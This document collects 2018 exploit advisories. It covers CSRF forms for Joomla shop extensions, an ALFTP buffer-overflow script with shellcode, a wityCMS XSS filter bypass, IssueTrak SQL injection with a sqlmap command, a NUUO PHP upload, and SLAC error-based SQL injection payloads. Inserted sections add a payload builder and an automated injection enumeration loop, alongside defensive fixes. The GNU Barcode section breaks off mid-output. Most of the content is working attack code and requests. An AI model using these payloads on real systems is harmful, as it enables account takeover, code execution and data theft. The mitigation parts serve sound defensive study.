# Exploit Title: Joomla! extension jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery
# Date: 2018-05-28
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 2.3.0.2
# Tested on: Kali linux
===================================================

# POC :

# Change user information exploit :

<html>
  <body>
    <form action="http://site.com/jcart/account/edit.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="firstname" value="D3C0DE" />
      <input type="hidden" name="lastname" value="revenge" />
      <input type="hidden" name="email" value="decod3&#46;n&#64;gmail&#46;com" />
      <input type="hidden" name="telephone" value="100000" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>


# Change password exploit :

<html>
  <body>
    <form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="2468" />
      <input type="hidden" name="confirm" value="2468" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>


# Change affiliate account information exploit :

<html>
  <body>
    <form action="http://site.com/jcart/account/affiliate/edit.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="company" value="decode" />
      <input type="hidden" name="website" value="test&#46;com" />
      <input type="hidden" name="tax" value="100000000" />
      <input type="hidden" name="payment" value="paypal" />
      <input type="hidden" name="cheque" value="&#13;" />
      <input type="hidden" name="paypal" value="test&#64;test&#46;com" />
      <input type="hidden" name="bank&#95;name" value="&#13;" />
      <input type="hidden" name="bank&#95;branch&#95;number" value="&#13;" />
      <input type="hidden" name="bank&#95;swift&#95;code" value="&#13;" />
      <input type="hidden" name="bank&#95;account&#95;name" value="&#13;" />
      <input type="hidden" name="bank&#95;account&#95;number" value="&#13;" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>

====================================================
            
# Exploit Title: ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)
# Exploit Author: Gokul Babu
# Vendor Homepage: http://www.altools.com/downloads/alftp.aspx
# Vulnerable Software: http://advert.estsoft.com/?event=201001127730323
# Tested on: Windows XP Professional SP3 -Version-2002
# Steps to reproduce (eip overwrite-88-windows-XP):
# Run the script below to generate alftp.txt, then paste its contents into 'Options -> Preferences -> Security -> New password & Confirm password'

#seh- 0041A6EF "\xEF\xA6\x41"
#address to jump 0012FA7A
#nseh- "\xEB\xAC\x90\x90"
#winexec address 0x7c862aed

#!/usr/bin/env python3
# Layout written to alftp.txt:
#   [4 NOPs][shellcode][NOP pad up to 80 bytes][nSEH: jmp short -0x54 back into the sled][SEH: 0x0041A6EF, 3 bytes + NUL terminator]

shellcode = (b"\x33\xC0"              # xor eax,eax
             b"\x50"                  # push eax            ; NUL terminator for "calc"
             b"\x68\x63\x61\x6C\x63"  # push "calc"
             b"\x8B\xC4"              # mov eax,esp         ; eax -> "calc\0"
             b"\x50"                  # push eax            ; lpCmdLine
             b"\xE8\x61\x30\x73\x7C") # call WinExec        ; rel32 resolving to 0x7c862aed

buf = b"\x90" * 4 + shellcode + b"\x90" * (80 - len(shellcode)) + b"\xEB\xAC\x90\x90" + b"\xEF\xA6\x41"

with open("alftp.txt", "wb") as f:
    f.write(buf)
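As an added worked example (not part of the original exploit), the following Python 3 script re-derives the two relative offsets that the payload above hard-codes: the nSEH short jump back into the NOP sled and the `call WinExec` displacement. The only addresses it takes from the advisory are the SEH handler 0x0041A6EF, WinExec at 0x7c862aed and the landing address 0x0012FA7A; the buffer base 0x0012FA78 is an assumption (two bytes before the landing address, so that the short jump lands inside the sled) and must be re-verified in a debugger on any other build.

```python
import struct

# Values stated in the advisory (Windows XP SP3, no ASLR)
SEH_HANDLER = 0x0041A6EF     # SEH record overwrite (alftp image, no rebase)
WINEXEC = 0x7C862AED         # kernel32!WinExec on the tested XP SP3
LANDING = 0x0012FA7A         # where the nSEH jump is meant to land (inside the NOP sled)
BUF_BASE = LANDING - 2       # ASSUMED: stack address of the first byte of our buffer
NSEH_OFFSET = 4 + 80         # 4 NOPs + 80-byte shellcode/NOP region before the nSEH slot


def short_jmp(from_addr, to_addr):
    """Encode 'jmp short rel8' (EB xx); rel8 is relative to the end of the 2-byte instruction."""
    rel = to_addr - (from_addr + 2)
    if not -128 <= rel <= 127:
        raise ValueError("target %#x out of rel8 range from %#x" % (to_addr, from_addr))
    return b"\xEB" + struct.pack("<b", rel)


def call_rel32(from_addr, target):
    """Encode 'call rel32' (E8 xx xx xx xx); rel32 is relative to the end of the 5-byte instruction."""
    rel = (target - (from_addr + 5)) & 0xFFFFFFFF
    return b"\xE8" + struct.pack("<I", rel)


def build_shellcode(at):
    """WinExec("calc") stub; the relative call makes it position-dependent, so it needs its own address."""
    body = (b"\x33\xC0"      # xor eax,eax
            b"\x50"          # push eax        ; NUL terminator for the string below
            b"\x68calc"      # push "calc"
            b"\x8B\xC4"      # mov eax,esp     ; eax -> "calc\0"
            b"\x50")         # push eax        ; lpCmdLine (uCmdShow is whatever sits above it)
    return body + call_rel32(at + len(body), WINEXEC)


def build_payload(buf_base=BUF_BASE):
    """[4 NOPs][shellcode][NOP pad to 80][nSEH: jmp short back][SEH handler, 3 bytes; NUL comes from the terminator]."""
    nops = b"\x90" * 4
    shellcode = build_shellcode(buf_base + len(nops))
    pad = b"\x90" * (80 - len(shellcode))
    nseh = short_jmp(buf_base + NSEH_OFFSET, LANDING) + b"\x90\x90"
    seh = struct.pack("<I", SEH_HANDLER)[:3]
    return nops + shellcode + pad + nseh + seh


if __name__ == "__main__":
    payload = build_payload()
    print(payload.hex())
    with open("alftp.txt", "wb") as f:
        f.write(payload)
```

With the assumed base the script reproduces the advisory's bytes exactly (nSEH `EB AC`, call displacement `61 30 73 7C`); if the buffer lands elsewhere, only `BUF_BASE` changes and both offsets are recomputed, which is the point of not hard-coding them.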
            
# Exploit Title: wityCMS 0.6.1 Persistent XSS on "Website's name" field
# Date: 05/28/2018
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Vendor Homepage: https://creatiwity.net/witycms
# Software Link: https://github.com/Creatiwity/wityCMS/releases/tag/0.6.1
# Version: 0.6.1
# Tested on: Windows 10 x64 (XAMPP, Chrome)
# CVE: CVE-2018-11512

*Description
 
A persistent/stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to admin/settings/general.
 
*Proof of Concept
 
1. Attacker logs in as an administrator of the site.
2. Attacker opens the administration page and navigates to the "General" menu, then "Settings".
3. Attacker enters the script below in the "Website's name" field:
<scri<script>pt>alert(1)</scri</script>pt>
Note: The "script" tag is filtered, but only in a single pass: once the inner tag is stripped, the surrounding fragments reassemble into a complete <script> tag, which is stored and executed.
4. Once the "Save" button is clicked, the payload executes.
5. When an unauthenticated user visits the home page, the payload also executes.
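The filter bypass in step 3 is a property of any single-pass tag stripper, not of wityCMS in particular. The following is an added Python model of that behaviour (wityCMS itself is PHP; this is not its code): a one-pass strip that reassembles the payload, a fixpoint variant that closes this specific bypass, and the output encoding a template should apply regardless of input filtering.

```python
import html
import re

# Matches an opening or closing <script ...> tag; this is the one thing the filter removes
SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)

PAYLOAD = "<scri<script>pt>alert(1)</scri</script>pt>"   # payload from the advisory


def strip_script_once(value):
    """One pass over the input, as the advisory describes: each tag found is removed once and
    the result is not re-scanned, so the fragments around it join into a fresh tag."""
    return SCRIPT_TAG.sub("", value)


def strip_script_fixpoint(value):
    """Repeat until a pass removes nothing. This closes the nesting trick but still leaves
    every vector the regex does not know about (event handlers, <img onerror>, ...) untouched."""
    previous = None
    while previous != value:
        previous, value = value, SCRIPT_TAG.sub("", value)
    return value


def render_site_name(value):
    """Output encoding for an HTML text context: the fix that does not depend on
    enumerating dangerous tags, and what the template should do in any case."""
    return html.escape(value, quote=True)
```

`strip_script_once(PAYLOAD)` yields exactly `<script>alert(1)</script>`, which is what the CMS stored; `render_site_name` on the same stored value produces inert text, which is why the upstream fix belongs at the point of output rather than in a blacklist on input.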
  
*Mitigation
 
See https://github.com/Creatiwity/wityCMS/commit/7967e5bf15b4d2ee6b85b56e82d7e1229147de44
 
Timeline
 
2018-05-27: Vulnerability reported to wityCMS development team
2018-05-27: CVE requested from mitre.org
2018-05-28: wityCMS development team acknowledges and will push the fix to production in 0.6.2
2018-05-28: CVE published by MITRE: https://twitter.com/CVEnew/status/1001093385929805831
            
# Exploit Title: Joomla! extension JoomOCShop 1.0 - Cross-Site Request Forgery
# Date: 2018-05-28
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/joomocshop/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 1.0
# Tested on: Kali linux
===================================================

# POC :

# Change user information exploit :

<html>
  <body>
    <form action="http://site.com/joomoc2/?route=account/edit" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="firstname" value="decode" />
      <input type="hidden" name="lastname" value="revenge" />
      <input type="hidden" name="email" value="decod3&#46;n&#64;gmail&#46;com" />
      <input type="hidden" name="telephone" value="100000" />
      <input type="hidden" name="fax" value="&#13;" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>


# Change password exploit :

<html>
  <body>
    <form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="test" />
      <input type="hidden" name="confirm" value="test" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>

====================================================
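Both the jCart and the JoomOCShop advisories above exploit the same defect: the account handlers accept any POST that carries the victim's session cookie, so an auto-submitting form on an attacker's page is indistinguishable from the real one. The following is an added Python model of the check those handlers lack (neither extension's code, which is PHP): an Origin/Referer comparison against the site's own origin plus a per-session synchronizer token. The origin `http://site.com` is taken from the PoC URLs and is an assumption about deployment.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://site.com"    # ASSUMED: origin the shop is served from (the PoC targets http://site.com)


def issue_csrf_token(session):
    """Per-session secret; embed it as a hidden field in every state-changing form."""
    if "csrf" not in session:
        session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def _same_origin(url):
    """Exact scheme/host/port match; prefix matching would accept site.com.attacker.example."""
    want, got = urlsplit(SITE_ORIGIN), urlsplit(url or "")
    return (got.scheme, got.hostname, got.port) == (want.scheme, want.hostname, want.port)


def csrf_check(session, form, headers):
    """Two independent checks; a forged auto-submitting form like the PoC fails both."""
    # 1. Origin (Referer as fallback): browsers attach these to cross-site form posts,
    #    and a multipart/form-data POST is a "simple" request, so no preflight stops it.
    source = headers.get("Origin") or headers.get("Referer")
    if not source or not _same_origin(source):
        return False, "cross-site request"
    # 2. Synchronizer token: present and equal to the session's, compared in constant time
    expected, supplied = session.get("csrf", ""), form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or mismatched csrf token"
    return True, "ok"


def account_edit(session, form, headers):
    """Model of the account/edit handler from the advisories with the check in front of the write."""
    ok, reason = csrf_check(session, form, headers)
    if not ok:
        return {"status": 403, "reason": reason}
    session["profile"] = {k: form.get(k, "") for k in ("firstname", "lastname", "email", "telephone")}
    return {"status": 200, "reason": "updated"}
```

The same guard belongs in front of `account/password` and `account/affiliate/edit`; setting `SameSite=Lax` on the session cookie is worth adding as defence in depth, since it stops the browser from attaching the cookie to the attacker's cross-site POST in the first place.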
            
================
Exploit Title: SQL Injection Vulnerability in Issue Trak <= 7.0 (Possibly applicable up to version 9.7)
Date: 05-28-2018
Vendor Homepage: http://issuetrak.com
Version: Confirmed 7.0; <= 7.0 extremely likely; up to 9.7 very likely
Google Dork: inurl:"IssueTrak" inurl:"asp"
Discovered By: Chris Anastasio
================


Vulnerable Endpoint
===================
www.example.com/IssueTrak/IssueSearch_Process.asp



Vulnerable Parameters
=====================
Status
Priority
inp_IssueType
SubmittedBy
EnteredBy
AssignedTo
AssignedBy
NextActionBy
ClosedBy
ProjectManager
inp_OrgID



Raw HTTP Request
===========================
POST /IssueTrak/IssueSearch_Process.asp HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 905

TestField=dummy&Mode=&Deleted=false&ReportID=x&Status=*&SubstatusID=&Priority=&inp_IssueType=&HiddenSubtype=&HiddenSubtype2=&inp_IssueSubTypeMem=-1&SearchAll=fds&Subject=&NoteText=&Solution=&UserDef1=&CSOneID=&CSTwoID=&UserDef3=&CSThreeID=&UserDef4=&CSFourID=&SubmittedBy=&EnteredBy=&AssignedTo=&EverAssignedTo=&AssignedBy=&NextActionBy=&ClosedBy=&ProjectManager=&inp_OrgID=&OrganizationIssues=&TaskAssignedTo=&method_TargetDate=&start_TargetDate=&end_TargetDate=&method_DateOpened=&start_DateOpened=&end_DateOpened=&method_DateClosed=&start_DateClosed=&end_DateClosed=&TimeOpen=&TimeOpenDays=More&AdjTimeOpen=&AdjTimeOpenDays=More&Hours=&TimeOpenHours=More&TaskDescription=&TaskAssignedToName=&method_TaskDateCompleted=&start_TaskDateCompleted=&end_TaskDateCompleted=&Title=&OutputOptions=BriefList&ShowCriteria=on&SortOn1=&SortOrder1=Asc&SortOn2=&SortOrder2=Asc&SortOn3=&SortOrder3=Asc



SQLMap command
==============
sqlmap -r issueTrakSearchReq.txt --dbms=mssql --level=5 --batch
Notes: 
	- "issueTrakSearchReq.txt" should be a plain text file containing the raw HTTP request shown above. 
	- The "Host" header of the HTTP request should be updated with an IP address that hosts an IssueTrak 7.0 installation.

	
	
Notes
=====
- A SQL injection vulnerability has been identified in IssueTrak 7.0 which, if successfully exploited, could allow an attacker to access sensitive information in the database.
- Authentication is normally required to reach this endpoint: a request without injection is answered with a redirect to the login page. On the back end, however, the request touches the database even when unauthenticated, so the injection is exploitable from a pre-authentication vantage point.
- IssueTrak 7.0 was released in 2006.
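The eleven injectable parameters are all optional search filters, which is the shape of endpoint most often built by gluing strings together. The following is an added Python/sqlite3 example (not IssueTrak's classic-ASP code; the issues table and its columns are constructed here to mirror three of the affected fields) showing that pattern beside its parameterized form, and putting the authentication check ahead of any database work, which is the second defect the notes describe.

```python
import sqlite3

FILTER_COLUMNS = ("Status", "Priority", "AssignedTo")   # allowlist of columns a filter may name


def make_db():
    """Constructed stand-in for the issue table; not the real IssueTrak schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE issues (id INTEGER, Status TEXT, Priority TEXT, AssignedTo TEXT)")
    db.executemany("INSERT INTO issues VALUES (?,?,?,?)", [
        (1, "Open", "High", "alice"),
        (2, "Closed", "Low", "bob"),
        (3, "Open", "Low", "carol"),
    ])
    return db


def search_vulnerable(db, filters):
    """String-built WHERE clause: every non-empty field becomes SQL text, so each is injectable."""
    where = " AND ".join("%s = '%s'" % (col, val) for col, val in filters.items() if val)
    sql = "SELECT id FROM issues" + (" WHERE " + where if where else "")
    return sorted(r[0] for r in db.execute(sql))


def search_safe(db, filters):
    """Column names are checked against the allowlist; values travel only as bound parameters."""
    clauses, params = [], []
    for col, val in filters.items():
        if col not in FILTER_COLUMNS:
            raise ValueError("unknown filter column %r" % col)
        if val:
            clauses.append("%s = ?" % col)
            params.append(val)
    sql = "SELECT id FROM issues" + (" WHERE " + " AND ".join(clauses) if clauses else "")
    return sorted(r[0] for r in db.execute(sql, params))


def handle_search(db, session, filters):
    """Authorize first: the advisory notes the original queries the database and only then redirects."""
    if not session.get("user"):
        return {"status": 302, "location": "/login"}   # ASSUMED: wherever the real login page lives
    return {"status": 200, "ids": search_safe(db, filters)}
```

The classic boolean payload in the `Status` field turns the vulnerable query into `WHERE Status = 'x' OR '1'='1'` and returns every row; the bound version compares against the literal string and returns nothing, and an unauthenticated caller never reaches either query.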



Timeline
========
2018-05-18: Initial vendor contact
2018-05-21: Vendor implies that this version of IssueTrak is no longer supported, and states that releases from 9.7 onward do not suffer from this vulnerability
2018-05-28: PoC details published



About Illumant
==============
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks.  Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant.  For more information, visit https://illumant.com/
            
# Exploit Title: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
# Google Dork: intitle:NUUO Network Video Recorder Login
# Date: 2018-05-20
# Exploit Author: M3@Pandas
# Vendor Homepage: http://www.nuuo.com
# Software Link: N/A
# Version: all
# Tested on: PHP Linux
# CVE : CVE-2018-11523

==========================
Advisory: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
Author: M3@pandas From DBAppSecurity
Affected Version: All
==========================
Vulnerability Description
==========================


Recently, I found an arbitrary file upload vulnerability in the 'NUUO NVRmini2' program; NVRmini2 is widely used all over
the world.


Vulnerable cgi: /upload.php


<?php
//echo $_FILES['userfile']['type'];
//echo ":";
//echo $_FILES['userfile']['size'];
//echo ":";
//echo urldecode($_FILES['userfile']['name']);
//echo ":";
//echo $_FILES['userfile']['tmp_name'];
//echo ":";
//echo $_FILES['userfile']['error'];
//echo ":";
echo $_FILES['userfile']['name'];
copy($_FILES["userfile"]["tmp_name"],$_FILES['userfile']['name']);
?>




As the code above shows, there is no filtering at all: the uploaded temporary file is copied to a path taken verbatim from the client-supplied filename, so a PHP shell can be uploaded directly to the web server.


==========================
POC / EXP
==========================


1. Upload 'nuuonvr.php' to web root path:

POST /upload.php HTTP/1.1
Host: 192.168.10.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=--------969849961
Content-Length: 162

----------969849961
Content-Disposition: form-data; name="userfile"; filename="nuuonvr.php"

<?php phpinfo();@unlink(__FILE__);?>
----------969849961--


2. Check if the php file is uploaded successfully:
	GET http://192.168.10.1/nuuonvr.php

 If the page returns phpinfo() output, the target is vulnerable.
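The upload handler above trusts two client-controlled things, the filename (used as the destination path) and the implied file type. The following is an added Python example of the hardened counterpart (not NUUO's code, which is PHP): the client name contributes at most an allowlisted extension, the content is checked against that type's magic bytes, and the file is created under a server-chosen random name with `O_EXCL`. The image-only allowlist is an assumption about what an NVR web UI needs to accept; the directory should live outside the web root.

```python
import os
import secrets

# ASSUMED policy: only images, identified by magic bytes; no script type is ever on the list
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def safe_store(client_filename, data, upload_dir):
    """Hardened counterpart of copy($tmp, $_FILES['userfile']['name']). Returns the stored path."""
    # Only the extension of the client name is consulted, and only against the allowlist
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    if ext == ".jpeg":
        ext = ".jpg"
    if ext not in ALLOWED:
        raise ValueError("extension %r not allowed" % ext)
    # The bytes must look like the claimed type, so 'cam.jpg' full of PHP is refused too
    if not any(data.startswith(sig) for sig in ALLOWED[ext]):
        raise ValueError("content does not match %s" % ext)
    # Server-chosen random name; the realpath check is defence in depth against a bad upload_dir
    root = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(root, secrets.token_hex(16) + ext))
    if os.path.dirname(dest) != root:
        raise ValueError("destination escapes upload directory")
    # O_EXCL: create a new file or fail; never overwrite something already there
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return dest


def store_or_reason(client_filename, data, upload_dir):
    """Convenience wrapper: ('ok', path) or ('rejected', reason)."""
    try:
        return "ok", safe_store(client_filename, data, upload_dir)
    except ValueError as e:
        return "rejected", str(e)


def demo():
    """Run the advisory's upload and two variants against a scratch directory (constructed inputs)."""
    import tempfile
    d = tempfile.mkdtemp()
    return {
        "root": os.path.realpath(d),
        "php": store_or_reason("nuuonvr.php", b"<?php phpinfo();@unlink(__FILE__);?>", d),
        "fake_jpg": store_or_reason("cam.jpg", b"<?php phpinfo(); ?>", d),
        "png": store_or_reason("cam.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16, d),
    }
```

Because the stored name is random and the extension is ours, neither a traversal sequence nor a double extension in the client's filename reaches the filesystem, and a `.jpg` that actually holds PHP is rejected on content, not on name.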
            
# # # # # 
# Exploit Title: SLAC v1.0: Blind SQL Injection / XPath Injection
# Date: 29-05-2018
# Vendor Homepage: https://sitemakin.com/login-script-demo
# Exploit Author: Divya Jain
# Version: v1.0
# CVE: CVE-2018-11535
# Category: Webapps
# Severity: High
# Tested on: KaLi LinuX_x64
# # # # #

# Proof of Concept:
        ////////////////////////////////////////////////
          SQL Injection in "my_item_search" parameter
       ////////////////////////////////////////////////
    
	# Affected Link: demo.com/login-script-demo/users.php
	
	# Parameter "my_item_search" is exploitable via error-based SQL injection: MySQL's extractvalue() rejects the injected value as an XPath expression and echoes it back inside the error message, so one query result is leaked per request.
	
	# Payload 1: 
	my_item_search=1337'and extractvalue(5566,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -
	# Payload 2:
	my_item_search=1337'and extractvalue(5566,concat(0x7e,(select  column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -
	
# POC 1 (Result: Table_name)
/////////REQUEST//////////

		POST /login-script-demo/users.php HTTP/1.1
		Host: sitemakin.com
		User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
		Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
		Accept-Language: en-US,en;q=0.5
		Accept-Encoding: gzip, deflate
		Referer: https://demo.com/login-script-demo/users.php
		Content-Type: application/x-www-form-urlencoded
		Content-Length: 171
		Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
		Connection: close
		Upgrade-Insecure-Requests: 1

		my_item_search=1337'and extractvalue(5566,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -&submit=Search

/////////RESPONSE//////////

		<form method="post" action="/login-script-demo/users.php">
		<select class="new-url2 form-control" name="my_item">
		<br />
		<b>Warning</b>:  PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
		<br />
		<b>Warning</b>:  main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
				 <option value="all">All</option>



# POC 2 (Result: Column_name)
/////////REQUEST//////////

		POST /login-script-demo/users.php HTTP/1.1
		Host: sitemakin.com
		User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
		Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
		Accept-Language: en-US,en;q=0.5
		Accept-Encoding: gzip, deflate
		Referer: https://demo.com/login-script-demo/users.php
		Content-Type: application/x-www-form-urlencoded
		Content-Length: 175
		Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
		Connection: close
		Upgrade-Insecure-Requests: 1

		my_item_search=1337'and extractvalue(5566,concat(0x7e,(select  column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -&submit=Search

/////////RESPONSE//////////

		<form method="post" action="/login-script-demo/users.php">
		<select class="new-url2 form-control" name="my_item">
		<br />
		<b>Warning</b>:  PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
		<br />
		<b>Warning</b>:  main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
				 <option value="all">All</option>
				 
################################################################################
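The two PoCs above are one technique applied twice: wrap a single-row subquery in `~` markers, hand it to `extractvalue()`, and read the value back out of the XPATH syntax error that lands in the page. The following is an added Python example (not the advisory author's tooling) that parses that error and drives the `LIMIT n,1` loop until a request leaks nothing. The transport is left to a caller-supplied `send(payload)` function; the `fake_send` included here is a constructed stand-in that answers with the same warning text the advisory shows, so the loop can be exercised offline.

```python
import re

# MySQL echoes the expression it could not parse; the 0x7e (~) markers delimit our value inside it
LEAK = re.compile(r"XPATH syntax error: '~(.*?)~'")


def build_payload(subquery):
    """Payload shape from the advisory: the subquery's single value is wrapped in ~ and fed to extractvalue()."""
    return "1337'and extractvalue(5566,concat(0x7e,(%s),0x7e ))-- -" % subquery


def tables_query(offset):
    return "select table_name from information_schema.tables where table_schema=database() LIMIT %d,1" % offset


def columns_query(table, offset):
    return 'select column_name from information_schema.columns where table_name="%s" LIMIT %d,1' % (table, offset)


def extract_leak(body):
    """Return the value between the ~ markers, or None when the response carries no error."""
    m = LEAK.search(body)
    return m.group(1) if m else None


def enumerate_values(send, query_for_offset):
    """Walk LIMIT n,1 upwards until a request leaks nothing: past the last row the subquery
    returns NULL, concat() is NULL, and extractvalue() raises no error."""
    found, offset = [], 0
    while True:
        value = extract_leak(send(build_payload(query_for_offset(offset))))
        if value is None or value in found:   # second clause guards against a server that ignores LIMIT
            break
        found.append(value)
        offset += 1
    return found


# Constructed stand-in for the remote users.php so the loop runs offline; the data is invented
FAKE_SCHEMA = {"tables": ["access_level", "users"], "columns": {"access_level": ["id", "level"]}}


def fake_send(payload):
    offset = int(re.search(r"LIMIT (\d+),1", payload).group(1))
    t = re.search(r'table_name="([^"]+)"', payload)
    rows = FAKE_SCHEMA["columns"].get(t.group(1), []) if t else FAKE_SCHEMA["tables"]
    if offset < len(rows):
        return ("<b>Warning</b>:  PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 "
                "XPATH syntax error: '~%s~' in post_users.inc.php on line <b>33</b><br />" % rows[offset])
    return '<option value="all">All</option>'
```

One caveat a practitioner will hit immediately: MySQL truncates the XPath error text to 32 characters, so values longer than about 30 characters have to be pulled in slices with `substring()` over the same `concat()` and reassembled client-side.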
            
# GNU Barcode 0.99 - Memory Leak
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Affected version: 0.99
# Tested on: Ubuntu 16.04.4
# Author: Gjoko 'LiquidWorm' Krstic

# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.

# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
# by malicious people to cause a DoS (Denial of Service). The LeakSanitizer report below
# attributes a 512-byte leak to the getopt_desc buffer allocated with calloc() in
# commandline() ('cmdline.c', line 132) and never freed, plus a 55-byte strdup() allocation;
# the reproduction passes the input string as the -b command-line argument. The
# vulnerability is confirmed in version 0.99. Other versions may also be affected.

cmdline.c:

128: int commandline(struct commandline *args, int argc, char **argv,
129:                 char *errorhead)
130: {
131:     struct commandline *ptr;
132:     char *getopt_desc = (char *)calloc(512, 1);
133:     int desc_offset = 0;
134:     int opt, retval;
135:     char *value;

lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog

%%Page: 1 1

% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled  1.00, encoded using "code 128-B"
% The space/bar succession is represented by the following widths (space first):
% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
[
%  height  xpos   ypos  width       height  xpos   ypos  width
   [75.00  11.00  15.00  1.85]      [75.00  13.50  15.00  0.85]
   [75.00  16.50  15.00  0.85]      [70.00  21.50  20.00  0.85]
   [70.00  27.00  20.00  3.85]      [70.00  30.50  20.00  0.85]
   [70.00  32.50  20.00  0.85]      [70.00  35.50  20.00  2.85]
   [70.00  40.00  20.00  1.85]      [70.00  43.50  20.00  0.85]
   [70.00  48.50  20.00  0.85]      [70.00  51.00  20.00  1.85]
   [70.00  54.50  20.00  0.85]      [70.00  57.50  20.00  0.85]
   [70.00  62.00  20.00  3.85]      [70.00  65.50  20.00  0.85]
   [70.00  68.50  20.00  0.85]      [70.00  71.00  20.00  1.85]
   [70.00  76.50  20.00  0.85]      [70.00  80.00  20.00  3.85]
   [70.00  84.50  20.00  0.85]      [70.00  87.50  20.00  0.85]
   [70.00  91.00  20.00  1.85]      [70.00  96.50  20.00  0.85]
   [70.00  98.50  20.00  0.85]      [70.00 101.00  20.00  1.85]
   [70.00 104.50  20.00  0.85]      [70.00 109.50  20.00  0.85]
   [70.00 113.00  20.00  3.85]      [70.00 117.50  20.00  0.85]
   [70.00 120.50  20.00  0.85]      [70.00 123.50  20.00  2.85]
   [70.00 128.00  20.00  1.85]      [70.00 131.50  20.00  0.85]
   [70.00 137.00  20.00  1.85]      [70.00 139.50  20.00  0.85]
   [70.00 142.50  20.00  0.85]      [70.00 147.50  20.00  0.85]
   [70.00 151.00  20.00  1.85]      [70.00 154.50  20.00  2.85]
